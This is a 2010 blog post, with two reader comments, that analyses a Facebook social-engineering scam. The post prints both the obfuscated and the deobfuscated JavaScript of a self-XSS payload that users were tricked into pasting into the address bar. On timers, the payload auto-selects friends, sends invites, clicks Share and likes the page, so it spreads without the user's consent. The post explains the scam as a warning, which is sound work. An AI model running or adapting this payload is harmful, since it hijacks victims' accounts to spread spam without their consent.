People need protection from themselves

Posted Thu, May 13 2010 14:20 by bill

It’s amazing how many people fall for scams and social engineering tricks on the internet. Some may remember the classic “I Love you” virus from back at the start of the century: it infected 50 million users within a week or two.  It was actually a very amateurish virus except for one detail: social engineering. The mere name of the attachment was enough to entice people to open and execute the attached script.  Fast forward ten years …………

Ten years later, the year is 2010, and computers are more common place, and generally one would expect people to be more computer savvy.  Yet today on facebook I saw lots of people had clicked on and executed a script from a site talking claiming to have “The 9 Safest Ways to Have Unprotected Sex”. Over a quarter of a million facebook users have fallen to this social engineering. This one is a bit benign, but it’s still social engineering that gets people to execute a script that otherwise wouldn’t be able to.

The site gets people to copy text to the clipboard then paste that in IE’s address bar. The text is :

BLOCKED SCRIPT(function(){a='app110142809028483_jop';b='app110142809028483_jode';ifc='app110142809028483_ifc'; ifo='app110142809028483_ifo';mw='app110142809028483_mwrapper';var _0xa049=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x63\x6C\x69\x63\x6B","\x73\x75\x67\x67\x65\x73\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x73\x6C\x69\x6E\x6B","\x69\x6E\x70\x75\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x53\x68\x61\x72\x65","\x6C\x69\x6B\x65\x6D\x65"];d=document;d[_0xa049[2]](mw)[_0xa049[1]][_0xa049[0]]=_0xa049[3];d[_0xa049[2]](a)[_0xa049[4]]=d[_0xa049[2]](b)[_0xa049[5]];d[_0xa049[2]](_0xa049[7])[_0xa049[6]]();setTimeout(function (){fs[_0xa049[8]]();} ,5000);setTimeout(function (){SocialGraphManager[_0xa049[11]](_0xa049[9],_0xa049[10]);setTimeout(function (){d[_0xa049[2]](_0xa049[12])[_0xa049[6]]();setTimeout(function (){inp=document[_0xa049[14]](_0xa049[13]);for(i in inp){if(inp[i][_0xa049[5]]==_0xa049[15]){inp[i][_0xa049[6]]();} ;} ;setTimeout(function (){d[_0xa049[2]](_0xa049[16])[_0xa049[6]]();d[_0xa049[2]](ifo)[_0xa049[4]]=d[_0xa049[2]](ifc)[_0xa049[5]];} ,5000);} ,3000);} ,3000);} ,5000);})();

 

Which basically translates to :

 

BLOCKED SCRIPT(function(){
a='app110142809028483_jop';
b='app110142809028483_jode';
ifc='app110142809028483_ifc';
ifo='app110142809028483_ifo';
mw='app110142809028483_mwrapper';
d=document;
d["getElementById"](mw)["style"]["visibility"]= "hidden";
d["getElementById"](a)["innerHTML"]=d["getElementById"](b)["value"];
d["getElementById"]("suggest")["click"]();
setTimeout(function (){fs["select_all"]();} ,5000);
setTimeout(function (){SocialGraphManager["submitDialog"]("sgm_invite_form","/ajax/social_graph/invite_dialog.php");
   setTimeout(function (){d["getElementById"]("slink")["click"]();
   setTimeout(function (){inp=document["getElementsByTagName"]("input");
   for(i in inp){if(inp[i]["value"]=="Share"){inp[i]["click"]();} ;} ;
   setTimeout(function (){d["getElementById"]("likeme")["click"]();
   d["getElementById"](ifo)["innerHTML"]=d["getElementById"](ifc)["value"];}
,5000);} ,3000);} ,3000);} ,5000);
})();

 

In that script it has timeouts that click on buttons, hence getting people to suggest it to other people, liking it, etc. without the person actually explicitly clicking on the submit buttons.

It’s classic social engineering, and people still fall for it. Oh wait … it’s facebook ;)

Filed under: ,

Comments

# re: People need protection from themselves

Wednesday, May 12, 2010 10:23 PM by bill

in the aove where it says BLOCKED SCRIPT that would read

j a v a s c r i p t :  

without the spaces. My blog host doesn't allow that kind of crap ;)

# re: People need protection from themselves

Tuesday, July 06, 2010 7:26 PM by Mike

Good post!  Found another one, "99% of people can't watch this video more than 25 seconds".  Has over HALF A MILLION 'likes'.  Same code, as far as I can tell (I'm not this kind of programmer, but the request to cut&paste java script, and the embedded hex chars caught my eye).

Unfortunately, FB is pretty weak in real security.  We're not far from the point where the bad people figure out how to hijack everything without asking you to cut&paste...